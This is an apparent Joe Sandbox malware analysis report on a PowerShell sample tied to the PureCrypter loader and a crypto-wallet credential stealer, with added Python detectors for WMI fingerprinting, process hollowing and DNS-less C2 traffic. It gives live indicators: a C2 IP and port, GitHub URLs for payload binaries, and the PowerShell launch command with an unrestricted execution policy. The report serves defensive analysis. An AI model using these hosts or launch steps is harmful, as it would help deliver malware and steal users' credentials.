Windows Analysis Report
92.255.57.112.ps1

Overview

General Information

Sample name:92.255.57.112.ps1
Analysis ID:1591628
MD5:7b7bab781f4b30aee1289f36a01606a0
SHA1:1b7a8d8302afa6f27f27d3d313865c2a4af61bdd
SHA256:e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98

Detection

PureCrypter
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected PureCrypter Trojan
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
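Several of the signatures above (the memory, PnP device, disk, physical memory and processor queries via WMI, and the Antivirus/Antispyware/Firewall check) are one technique: enumerate WMI classes whose values give away a hypervisor or a sandbox. A single such query is unremarkable; the tell is one process touching several of those classes within seconds. The scorer below is an added example written for this page, not Joe Sandbox or PureCrypter code. It reads operation strings in the form the report prints (`IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor`); only the first RegSvcs.exe operation string is taken from the report, while the sensitive-class list, the window and threshold, the benign inventory-agent process, its PID and all timestamps are assumptions.

```python
r"""
Added example (not Joe Sandbox code): flag a process that fingerprints the
machine through WMI by touching several hardware/AV classes in a short burst.

Input records are constructed in the operation-string form the report uses
("IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor").
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# WMI classes whose values differ between hypervisors and real hardware, and
# what a sample learns from each. Assumption: illustrative set, extend as needed.
SENSITIVE_CLASSES = {
    "win32_processor": "CPU name / core count",
    "win32_physicalmemory": "installed RAM modules",
    "win32_computersystem": "manufacturer, model, total memory",
    "win32_diskdrive": "disk model and size",
    "win32_pnpentity": "device names (VBox/VMware/QEMU strings)",
    "win32_bios": "BIOS vendor / version",
    "win32_videocontroller": "GPU name",
    "antivirusproduct": "installed AV (root\\SecurityCenter2)",
}

BURST_WINDOW = 60.0      # seconds (assumption)
BURST_MIN_CLASSES = 3    # distinct sensitive classes inside the window (assumption)

# "IWbemServices::<Method> - <namespace> : <class name or WQL query>"
_OP_RE = re.compile(r"IWbemServices::(?P<method>\w+)\s*-\s*(?P<ns>\S+)\s*:\s*(?P<rest>.+)", re.I)
_FROM_RE = re.compile(r"\bFROM\s+(\w+)", re.I)


@dataclass(frozen=True)
class WmiOp:
    ts: float          # epoch seconds
    client_pid: int    # process that issued the WMI call
    image: str
    operation: str     # operation string as the report prints it


def target_class(operation: str) -> Optional[str]:
    """Return the WMI class an operation touches (lower-cased), or None."""
    m = _OP_RE.match(operation.strip())
    if not m:
        return None
    rest = m.group("rest").strip()
    if m.group("method").lower() in ("execquery", "execnotificationquery"):
        q = _FROM_RE.search(rest)              # WQL: pull the class out of FROM
        return q.group(1).lower() if q else None
    return rest.split()[0].lower()             # CreateInstanceEnum/GetObject take a class name


def fingerprint_bursts(ops: List[WmiOp]) -> Dict[int, Tuple[str, List[str]]]:
    """Per client PID, report the first window in which at least
    BURST_MIN_CLASSES distinct sensitive classes were queried."""
    by_pid: Dict[int, List[Tuple[float, str, str]]] = defaultdict(list)
    for op in ops:
        cls = target_class(op.operation)
        if cls in SENSITIVE_CLASSES:
            by_pid[op.client_pid].append((op.ts, cls, op.image))
    findings: Dict[int, Tuple[str, List[str]]] = {}
    for pid, items in by_pid.items():
        items.sort()                                    # time order
        for i, (t0, _, image) in enumerate(items):      # sliding window from each query
            seen = {cls for t, cls, _ in items[i:] if t - t0 <= BURST_WINDOW}
            if len(seen) >= BURST_MIN_CLASSES:
                findings[pid] = (image, sorted(seen))
                break
    return findings


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
AGENT = r"C:\Program Files\Inventory\agent.exe"   # constructed benign process
T0 = 1_736_926_000.0                               # arbitrary epoch base

SAMPLE_OPS = [   # constructed; only the first operation string is from the report
    WmiOp(T0 + 0.0, 7136, REGSVCS, r"IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor"),
    WmiOp(T0 + 0.2, 7136, REGSVCS, r"IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory"),
    WmiOp(T0 + 0.4, 7136, REGSVCS, r"IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive"),
    WmiOp(T0 + 0.5, 7136, REGSVCS, r"IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity"),
    WmiOp(T0 + 1.0, 7136, REGSVCS, r"IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct"),
    # an inventory agent asks one hardware question now and an unrelated one much later
    WmiOp(T0 + 5.0, 3120, AGENT, r"IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor"),
    WmiOp(T0 + 900.0, 3120, AGENT, r"IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk"),
]

if __name__ == "__main__":
    for pid, (image, classes) in fingerprint_bursts(SAMPLE_OPS).items():
        print(f"pid={pid} {image} fingerprinted: {', '.join(classes)}")
```

Real inventory and monitoring agents query these classes too, so in production the allowlist of known client images matters as much as the threshold; the point of the burst rule is that an unsigned or unexpected process, here a bare RegSvcs.exe, has no reason to ask all of these questions at once.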

Classification

  • System is w10x64native
  • powershell.exe (PID: 6176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • RegSvcs.exe (PID: 7136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Malware Configuration

Name: PureCrypter
Description: According to Zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021. The malware has been observed distributing a variety of remote access trojans and information stealers. The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products. PureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google's Protocol Buffer message format.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

No configs have been found

Yara Overview

Source: 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: Process Memory Space: RegSvcs.exe PID: 7136
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Sigma Overview

Source: Process started
Author: frack113
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4952, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", ProcessId: 6176, ProcessName: powershell.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4952, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", ProcessId: 6176, ProcessName: powershell.exe

Suricata IDS Alerts

Timestamp: 2025-01-15T08:33:11.565512+0100
SID: 2035595
Severity: 1
Classtype: Domain Observed Used for C2 Detected
Source IP: 92.255.57.112
Source Port: 56001
Destination IP: 192.168.11.20
Destination Port: 49780
Protocol: TCP
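The process tree and the two Sigma matches above amount to two process-creation signals: powershell.exe started with `-ExecutionPolicy unrestricted`, and that PowerShell spawning RegSvcs.exe with no arguments. RegSvcs.exe does nothing useful without an assembly to register, so an argument-less launch from a script host is the usual shape of a process-hollowing target, which is consistent with the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures. The detector below is an added example written for this page, not Joe Sandbox code and not a published Sigma rule. The three malicious rows reuse the report's PIDs and command lines; the explorer.exe parent, the two benign control rows, the accepted switch abbreviations and the DOTNET_HOSTS list are assumptions.

```python
"""
Added example (not Joe Sandbox code): two process-creation detections over
Sysmon-EID-1-like records (pid, ppid, image, command line).

  (1) powershell.exe launched with an insecure -ExecutionPolicy value, and
  (2) powershell.exe spawning a .NET Framework utility with no arguments,
      the usual shape of a process-hollowing host.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

INSECURE_POLICIES = {"unrestricted", "bypass"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# .NET Framework utilities commonly abused as injection targets. Assumption:
# an illustrative list, not something the report enumerates.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe",
                "aspnet_compiler.exe", "applaunch.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # raw command line as logged


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes.

    A quoted span is one argument and the quotes themselves are dropped; that
    is enough for the launches seen here and avoids shell-style escaping.
    """
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def _is_execpolicy_switch(tok: str) -> bool:
    # powershell.exe resolves unambiguous prefixes, so the switch also shows up
    # as -ex, -exec, -ep and similar in real command lines (assumption: the
    # prefixes accepted here are the common ones, not the host's exact rules).
    t = tok.lower()
    return t == "-ep" or (len(t) >= 3 and "-executionpolicy".startswith(t))


def insecure_execution_policy(ev: ProcEvent) -> Optional[str]:
    """Return the insecure policy value if this PowerShell launch sets one."""
    if ntpath.basename(ev.image).lower() not in POWERSHELL_IMAGES:
        return None
    toks = split_cmdline(ev.cmdline)
    for i, tok in enumerate(toks[:-1]):          # the value is the next token
        if _is_execpolicy_switch(tok) and toks[i + 1].lower() in INSECURE_POLICIES:
            return toks[i + 1].lower()
    return None


def argless_dotnet_host(ev: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    """True when a .NET utility is spawned by PowerShell with no arguments."""
    if parent is None or ntpath.basename(parent.image).lower() not in POWERSHELL_IMAGES:
        return False
    if ntpath.basename(ev.image).lower() not in DOTNET_HOSTS:
        return False
    return len(split_cmdline(ev.cmdline)) <= 1   # image path only, nothing to register


def run_detections(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Evaluate both detections over a batch of events; returns (pid, reason)."""
    by_pid = {ev.pid: ev for ev in events}
    alerts = []
    for ev in events:
        policy = insecure_execution_policy(ev)
        if policy:
            alerts.append((ev.pid, f"PowerShell started with -ExecutionPolicy {policy}"))
        if argless_dotnet_host(ev, by_pid.get(ev.ppid)):
            alerts.append((ev.pid, f"{ntpath.basename(ev.image)} spawned by PowerShell "
                                   "with no arguments (likely injection host)"))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
SCRIPT = r"C:\Users\user\Desktop\92.255.57.112.ps1"

# Constructed sample: PIDs and command lines of rows 2-4 are from the report;
# the explorer.exe parent and the two benign control rows are made up.
SAMPLE_EVENTS = [
    ProcEvent(4952, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6176, 4952, PS, f'"{PS}" -noLogo -ExecutionPolicy unrestricted -file "{SCRIPT}"'),
    ProcEvent(2776, 6176, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(7136, 6176, REGSVCS, f'"{REGSVCS}"'),
    # controls: a script run under the default policy, and RegSvcs.exe given an
    # assembly to register, as a real installer would do
    ProcEvent(8001, 4952, PS, rf'"{PS}" -File C:\Scripts\backup.ps1'),
    ProcEvent(8002, 8001, REGSVCS, rf'"{REGSVCS}" "C:\Program Files\Vendor\Component.dll"'),
]

if __name__ == "__main__":
    for pid, reason in run_detections(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: {reason}")
```

The second rule is the more durable one: the execution-policy switch is trivially replaced by `-Command` or an encoded command, but a loader that hollows a .NET utility still has to start it, and a signed Microsoft binary started by a script host with an empty argument list is rare in legitimate activity.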

      AV Detection

Source: Submitted Sample. Integrated Neural Analysis Model: Matched 99.9% probability
Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C7C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157429117028.00000228DEC80000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

      Networking

Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.57.112:56001 -> 192.168.11.20:49780
Source: global traffic TCP traffic: 192.168.11.20:49780 -> 92.255.57.112:56001
Source: Joe Sandbox View ASN Name: TELSPRU TELSPRU
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.57.112 (this entry is repeated 29 times in the report)
Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158643986035.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.157428012843.00000228DEB69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft.c
Source: RegSvcs.exe, 00000003.00000002.158642977497.0000000000F19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegSvcs.exe, 00000003.00000002.158643986035.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
Source: powershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000339D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000000.00000002.157400544873.00000228C7995000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
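The networking evidence above is the classic loader pattern: the C2 endpoint is a bare IP address (the sample was submitted under that address as its file name), so RegSvcs.exe connects to 92.255.57.112:56001 with no preceding DNS lookup, on a port no common service uses. The correlation below is an added example, not Joe Sandbox code: it joins Sysmon-style DNS (EID 22) and network-connection (EID 3) records and reports external connections whose destination never appeared as a DNS answer on the host. The 92.255.57.112:56001 row and PID 7136 come from the report; every other address, the CNAME, the timestamps, the port list and the lookup window are constructed for the example.

```python
"""
Added example (not Joe Sandbox code): reproduce the report's "TCP traffic
detected without corresponding DNS query" and "traffic on non-standard ports"
signals from host telemetry.

Inputs are constructed subsets of Sysmon events: EID 22 (DNS query with its
raw QueryResults string) and EID 3 (network connection).
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class DnsEvent:               # Sysmon EID 22 subset
    ts: float                 # epoch seconds
    pid: int
    query_name: str
    query_results: str        # raw Sysmon QueryResults field


@dataclass(frozen=True)
class ConnEvent:              # Sysmon EID 3 subset
    ts: float
    pid: int
    image: str
    dst_ip: str
    dst_port: int


# Ports treated as "standard" here. Assumption: tune per environment.
STANDARD_PORTS = {80, 443, 53, 25, 465, 587, 993, 995, 8080, 8443}

# Local ranges to ignore, listed explicitly rather than via is_private so the
# documentation ranges used as stand-ins below still count as "external".
LOCAL_NETS = [ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
               "127.0.0.0/8", "169.254.0.0/16")]

DNS_WINDOW = 600.0            # seconds an answer keeps a destination "explained" (assumption)


def parse_query_results(raw: str) -> Tuple[str, ...]:
    """Extract IP answers from a Sysmon QueryResults string.

    Sysmon writes ';'-separated entries; CNAME entries start with 'type:' and
    IPv4 answers appear as IPv4-mapped IPv6 ('::ffff:203.0.113.10').
    """
    out = []
    for entry in raw.split(";"):
        entry = entry.strip()
        if not entry or entry.startswith("type:"):
            continue
        if entry.startswith("::ffff:"):
            entry = entry[len("::ffff:"):]
        try:
            out.append(str(ip_address(entry)))
        except ValueError:
            continue                      # not an address, ignore
    return tuple(out)


def is_local(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def unexplained_connections(dns: List[DnsEvent], conns: List[ConnEvent],
                            window: float = DNS_WINDOW) -> List[Tuple[ConnEvent, List[str]]]:
    """External connections whose destination was not a DNS answer on this
    host within `window` seconds before the connect, with the reasons."""
    answer_times: Dict[str, List[float]] = {}
    for d in dns:
        for ip in parse_query_results(d.query_results):
            answer_times.setdefault(ip, []).append(d.ts)

    findings = []
    for c in conns:
        if is_local(c.dst_ip):
            continue
        explained = any(c.ts - window <= t <= c.ts
                        for t in answer_times.get(c.dst_ip, ()))
        if explained:
            continue
        reasons = ["destination not returned by any DNS query on this host"]
        if c.dst_port not in STANDARD_PORTS:
            reasons.append(f"non-standard port {c.dst_port}")
        findings.append((c, reasons))
    return findings


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
T0 = 1_736_926_000.0   # arbitrary epoch base for the constructed timeline

SAMPLE_DNS = [   # constructed: the CNAME and the answer are stand-ins
    DnsEvent(T0 + 2, 6176, "ctldl.windowsupdate.com",
             "type:  5 cdn.example.net;::ffff:203.0.113.10;"),
]
SAMPLE_CONNS = [   # constructed; the RegSvcs.exe -> 92.255.57.112 row mirrors the report
    ConnEvent(T0 + 3, 6176, PS, "203.0.113.10", 80),          # resolved: CTL download
    ConnEvent(T0 + 4, 7136, REGSVCS, "192.168.11.1", 445),     # local: ignored
    ConnEvent(T0 + 9, 7136, REGSVCS, "92.255.57.112", 56001),  # C2: no DNS, odd port
    ConnEvent(T0 + 60, 7136, REGSVCS, "198.51.100.7", 443),    # no DNS, standard port
]

if __name__ == "__main__":
    for conn, reasons in unexplained_connections(SAMPLE_DNS, SAMPLE_CONNS):
        print(f"pid={conn.pid} {conn.image} -> {conn.dst_ip}:{conn.dst_port}: "
              + "; ".join(reasons))
```

Hosts that use DNS-over-HTTPS, a proxy that resolves on their behalf, or a long-lived cache will produce unresolved connections on their own, so in practice the rule pairs with the process context from the tree above (a bare RegSvcs.exe has no business opening sockets at all) and with the Suricata certificate match on the same flow.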
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853ECA470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853EC513A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853F90DAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B237F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B69C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B2454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B2388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B1E2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B1E37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_068B1F25
Source: classification engine Classification label: mal88.spyw.evad.winPS1@4/5@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\3e74489724f9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmlfz5sh.jw4.ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
